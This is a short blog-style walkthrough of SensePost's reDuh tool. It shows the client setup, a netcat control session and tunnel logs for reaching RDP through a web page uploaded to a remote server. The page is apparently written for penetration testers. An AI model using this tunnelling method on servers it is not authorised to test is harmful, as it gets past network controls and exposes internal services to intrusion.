A bit more on sensepost's reDuh
sensepost page on it: http://www.sensepost.com/research/reDuh/
reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client
yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
Once you are connected to the remote end, in another terminal connect to your local reDuh instance.
yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
Commands are of the form [command]{options}
Available commands:
[usage] - This menu
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity
Successfully bound locally to port 4567. Awaiting connections.
In your other shell you should see something similar to this:
[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.
Fire up your terminal server client and point it at localhost:4567
[Info]Requesting reDuh to create socket to
[Info]Successfully created socket 4567:
[Info]Localhost ====> (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== (11 bytes picked up from remote port) [Info]Localhost ====> (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1
If all is working you'll see a shitload of http traffic and eventually your RDP prompt.
Glad to see it's still being used, and works. Was a bit of a rush job coding that :)